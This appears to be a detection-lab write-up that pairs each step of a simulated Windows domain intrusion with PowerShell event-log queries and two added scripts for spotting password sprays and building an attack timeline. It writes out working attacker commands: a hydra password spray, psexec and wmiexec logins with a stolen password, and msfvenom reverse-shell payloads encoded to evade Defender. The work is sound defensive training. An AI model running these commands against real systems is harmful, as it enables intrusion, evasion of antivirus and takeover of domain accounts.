Password spray (-u loops over the user list for each password, so every account sees one guess per pass instead of a lockout-triggering burst): hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u
Count successful (4624) and failed (4625) logins:
Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count
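Counting 4624/4625 shows the burst; a spray is specifically one source failing against many distinct accounts in a short span, then succeeding as one of them. The script below is an added example and not part of the original lab notes: the XML field names (TargetUserName, IpAddress, LogonType) are the standard Security-Auditing ones, while the function names, thresholds and the sample records are assumptions for this lab.

```powershell
# Added example (not from the original lab notes): detect a password spray in
# 4625 events by counting distinct target accounts per source address, and
# report whether that source later logged on successfully (4624).

function ConvertFrom-LogonEvent {
    # Flatten a 4624/4625 EventLogRecord into the fields a spray hunt needs.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $data = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            Id        = $Event.Id
            User      = $data['TargetUserName']
            Source    = $data['IpAddress']
            LogonType = $data['LogonType']
        }
    }
}

function Find-PasswordSpray {
    # Flag every source that failed against at least $MinUsers distinct accounts
    # within $WindowMinutes (thresholds are assumptions; tune to the environment).
    param(
        [Parameter(Mandatory)] [object[]]$Logons,
        [int]$MinUsers = 5,
        [int]$WindowMinutes = 10
    )
    $failures = $Logons | Where-Object Id -eq 4625 | Group-Object Source
    foreach ($g in $failures) {
        $src    = $g.Name
        $events = $g.Group | Sort-Object Time
        $users  = @($events.User | Sort-Object -Unique)
        $span   = $events[-1].Time - $events[0].Time
        if ($users.Count -lt $MinUsers -or $span.TotalMinutes -gt $WindowMinutes) { continue }
        # Any 4624 from the same source after the spray began is the account that fell.
        $hits = @($Logons | Where-Object { $_.Id -eq 4624 -and $_.Source -eq $src -and $_.Time -ge $events[0].Time })
        [pscustomobject]@{
            Source        = $src
            Failures      = $events.Count
            DistinctUsers = $users.Count
            FirstSeen     = $events[0].Time
            LastSeen      = $events[-1].Time
            SucceededAs   = @($hits.User | Sort-Object -Unique) -join ','
        }
    }
}

# Constructed sample (not real log data): seven accounts tried from one host
# inside three minutes over SMB (logon type 3), then fgaeta succeeds; plus one
# unrelated interactive failure from another host that must not be flagged.
$t0 = Get-Date '2023-11-01 09:00:00'
$sample = @(
    0..6 | ForEach-Object {
        [pscustomobject]@{ Time = $t0.AddSeconds(20 * $_); Id = 4625; User = "user$_"; Source = '192.168.37.203'; LogonType = '3' }
    }
    [pscustomobject]@{ Time = $t0.AddMinutes(2); Id = 4625; User = 'fgaeta'; Source = '192.168.37.203'; LogonType = '3' }
    [pscustomobject]@{ Time = $t0.AddMinutes(3); Id = 4624; User = 'fgaeta'; Source = '192.168.37.203'; LogonType = '3' }
    [pscustomobject]@{ Time = $t0.AddMinutes(1); Id = 4625; User = 'jdoe';   Source = '192.168.37.50';  LogonType = '2' }
)
Find-PasswordSpray -Logons $sample | Format-List

# Lab usage against the exported log (path as used elsewhere on this page):
# Get-WinEvent -FilterHashtable @{Path='C:\labs\valkyrie-security-logons.evtx'; Id=4624,4625} |
#     ConvertFrom-LogonEvent | Find-PasswordSpray
```

On the sample, only 192.168.37.203 is reported (8 failures, 8 distinct users, SucceededAs fgaeta); the single failure from 192.168.37.50 stays below the threshold. The window check uses the first-to-last span of each source's failures rather than a true sliding window, which is enough for a short lab capture but will miss a slow spray spread over hours; lower the per-window threshold or bucket by hour for that case.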
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.37.237
msf6 > set SMBUser fgaeta
msf6 > set SMBPass W1nter2023!
msf6 > exploit
Service was created (before Defender killed it):
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7045}| fl
Command was executed (event 4688):
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx";id=4688}| Where {$_.Message -like "*powershell.exe -nop*"} | fl
Windows Defender Antivirus killed the connection:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | Where {$_.Message -like "*powershell.exe -nop*"} | fl
wmiexec.py fgaeta:W1nter2023\!@192.168.37.237
Microsoft Defender Antivirus: zero logs.
Sysmon event 1 (and security event 4688) shows WmiPrvSE.exe launching cmd.exe with its output redirected to a file on the ADMIN$ share:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*ADMIN$*"} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";} | Where {$_.Message -like "*whoami*"} | fl
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -x notepad.exe -f exe > plan.exe
Attacker uploads plan.exe via wmiexec.py's lput, tries to run it, and fails:
Upload:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=11} | Where {$_.Message -like "*plan.exe*"} | fl
The command executed:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*Image: C:\Users\fgaeta\plan.exe*"} | fl
Then Windows Defender killed it:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1116} | Where {$_.Message -like "*plan.exe*"} | fl | more
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -i 10 -e x64/xor_dynamic -x notepad.exe -f exe > plan.exe
The key difference: -i 10 -e x64/xor_dynamic (ten passes of the xor_dynamic encoder over the same payload and template).
Upload and execute:
Reverse meterpreter shell connects to Metasploit:
Upload/execution: same events as before.
Reverse shell connection to port 8080:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=3} | Where {$_.Message -like "*plan.exe*"} | fl
getsystem fails, so the attacker enables RDP.
The attacker then logs in via RDP and disables Windows Defender Antivirus:
Windows Defender Antivirus kills the getsystem command:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | fl | more
RDP is enabled:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*remotedesktop*"} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7040}| Where {$_.Message -like "*remote*"} | fl
getsystem is successful, so the attacker migrates the meterpreter DLL into another process and steals a domain admin token.
Process migration:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=8} | Where {$_.Message -like "*plan.exe*"} | fl
Nothing was logged during the token theft and impersonation of GALACTICA/Administrator.
Attacker runs meterpreter's shell command:
Attacker creates a domain account:
Attacker uses wmic to add the new account to the Domain Admins group:
Account creation:
Get-WinEvent @{Path="C:\labs\pegasus-security.evtx"; id=4720} | fl
New domain admin (4737 = security-enabled global group changed; the member addition itself is logged as 4728 on the DC):
Get-WinEvent @{Path="C:\labs\pegasus-security.evtx"; id=4737} | fl
Security log cleared on valkyrie (event 1102):
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx"; id=1102} | fl
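Each query above answers one question against one log. For the write-up, and for triage on a real host, the same events are more useful stitched into a single ordered timeline across the Security, System, Sysmon and Defender logs of valkyrie and the Security log of the DC pegasus. The script below is an added example and not part of the original lab notes: the provider names and event IDs are the standard Windows, Sysmon and Defender ones used on this page, while the rule labels, the function name, the file names and the sample records are assumptions.

```powershell
# Added example (not from the original lab notes): correlate the per-log
# queries on this page into one timeline keyed on (provider, event id), with
# an optional -like filter on Message for the noisy IDs (4688, Sysmon 1/3/8/11).

$script:TimelineRules = @(
    @{ Provider = 'Microsoft-Windows-Security-Auditing'; Id = 4625; Label = 'Failed logon (spray)' }
    @{ Provider = 'Microsoft-Windows-Security-Auditing'; Id = 4624; Label = 'Successful logon' }
    @{ Provider = 'Service Control Manager';             Id = 7045; Label = 'Service installed (psexec)' }
    @{ Provider = 'Microsoft-Windows-Security-Auditing'; Id = 4688; Label = 'Encoded PowerShell';        Pattern = '*powershell.exe -nop*' }
    @{ Provider = 'Microsoft-Windows-Windows Defender';  Id = 1116; Label = 'Defender detection' }
    @{ Provider = 'Microsoft-Windows-Windows Defender';  Id = 1117; Label = 'Defender action taken' }
    @{ Provider = 'Microsoft-Windows-Sysmon';            Id = 11;   Label = 'File written';             Pattern = '*plan.exe*' }
    @{ Provider = 'Microsoft-Windows-Sysmon';            Id = 1;    Label = 'Process created';          Pattern = '*plan.exe*' }
    @{ Provider = 'Microsoft-Windows-Sysmon';            Id = 3;    Label = 'Outbound connection';      Pattern = '*plan.exe*' }
    @{ Provider = 'Microsoft-Windows-Sysmon';            Id = 8;    Label = 'Remote thread (migrate)';  Pattern = '*plan.exe*' }
    @{ Provider = 'Service Control Manager';             Id = 7040; Label = 'Service start type changed'; Pattern = '*remote*' }
    @{ Provider = 'Microsoft-Windows-Security-Auditing'; Id = 4720; Label = 'Account created' }
    @{ Provider = 'Microsoft-Windows-Security-Auditing'; Id = 4737; Label = 'Global group changed' }
    @{ Provider = 'Microsoft-Windows-Eventlog';          Id = 1102; Label = 'Audit log cleared' }
)

function Get-AttackTimeline {
    # Match each record against the rule table (provider + id, then pattern) and
    # emit one row per hit, ordered by time so events from several hosts interleave.
    param([Parameter(Mandatory)] [object[]]$Events)
    $rows = foreach ($e in $Events) {
        foreach ($r in $script:TimelineRules) {
            if ($e.ProviderName -ne $r.Provider -or $e.Id -ne $r.Id) { continue }
            if ($r.Pattern -and $e.Message -notlike $r.Pattern) { continue }
            [pscustomobject]@{
                Time   = $e.TimeCreated
                Host   = $e.MachineName
                Id     = $e.Id
                Label  = $r.Label
                Detail = ($e.Message -split "`n")[0].Trim()   # first line of the message is enough for a timeline
            }
            break
        }
    }
    $rows | Sort-Object Time
}

# Constructed sample records (not real log data) shaped like EventLogRecord:
# a psexec service install on valkyrie, a plan.exe connection, a group change
# on pegasus, and a noisy 4688 that the pattern should drop.
$t0 = Get-Date '2023-11-01 09:10:00'
$sample = @(
    [pscustomobject]@{ ProviderName = 'Service Control Manager';             Id = 7045; TimeCreated = $t0;               MachineName = 'valkyrie.galactica.local'; Message = "A service was installed in the system.`nService Name: XyZaBc" }
    [pscustomobject]@{ ProviderName = 'Microsoft-Windows-Security-Auditing'; Id = 4688; TimeCreated = $t0.AddSeconds(5); MachineName = 'valkyrie.galactica.local'; Message = "A new process has been created.`nProcess Command Line: svchost.exe -k netsvcs" }
    [pscustomobject]@{ ProviderName = 'Microsoft-Windows-Sysmon';            Id = 3;    TimeCreated = $t0.AddMinutes(4); MachineName = 'valkyrie.galactica.local'; Message = "Network connection detected:`nImage: C:\Users\fgaeta\plan.exe DestinationPort: 8080" }
    [pscustomobject]@{ ProviderName = 'Microsoft-Windows-Security-Auditing'; Id = 4737; TimeCreated = $t0.AddMinutes(9); MachineName = 'pegasus.galactica.local';  Message = "A security-enabled global group was changed.`nGroup Name: Domain Admins" }
)
Get-AttackTimeline -Events $sample | Format-Table -AutoSize

# Lab usage: load every exported log at once and order the whole intrusion.
# $all = 'valkyrie-security','valkyrie-system','valkyrie-sysmon','valkyrie-defender','pegasus-security' |
#     ForEach-Object { Get-WinEvent -Path "C:\labs\$_.evtx" -ErrorAction SilentlyContinue }
# Get-AttackTimeline -Events $all | Format-Table -AutoSize
```

On the sample, three rows come out in time order (7045 on valkyrie, Sysmon 3 for plan.exe, 4737 on pegasus) and the svchost 4688 is dropped by the pattern. Keying on ProviderName as well as Id matters once logs are mixed: 1102 from Microsoft-Windows-Eventlog and the Sysmon IDs 1, 3, 8 and 11 would otherwise collide with unrelated events of the same number from other providers. Clock skew between valkyrie and pegasus shows up directly in this view, so check the two hosts' time sources before trusting the ordering across them.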